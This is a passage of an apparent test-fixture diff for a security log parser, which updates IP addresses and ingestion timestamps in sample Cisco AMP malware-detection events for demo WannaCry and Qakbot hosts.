"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831754\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010817700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831754\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -3068,7 +3068,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3111,7 +3111,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3125,8 +3125,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798736861Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":873000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831753\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qeriuwjhrf\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\qeriuwjhrf\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010823Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":873000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831753\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qeriuwjhrf\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\qeriuwjhrf\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -3148,7 +3148,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3191,7 +3191,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3205,8 +3205,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798739078Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":732000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010828300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":732000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -3228,7 +3228,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3271,7 +3271,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3285,8 +3285,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798741293Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010833700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -3308,7 +3308,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3351,7 +3351,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3365,8 +3365,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798743492Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010839Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -3388,7 +3388,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3431,7 +3431,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3445,8 +3445,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798745729Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010844300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -3468,7 +3468,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3509,7 +3509,7 @@ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3519,8 +3519,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798747986Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "ingested": "2021-12-09T13:35:47.010849600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -3540,7 +3540,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3594,7 +3594,7 @@ "f5a171c879b90e77861daf19741b373646d791ff" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3611,8 +3611,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798750224Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", + "ingested": "2021-12-09T13:35:47.010854800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3634,7 +3634,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3680,7 +3680,7 @@ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3693,8 +3693,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798752439Z", - "original": 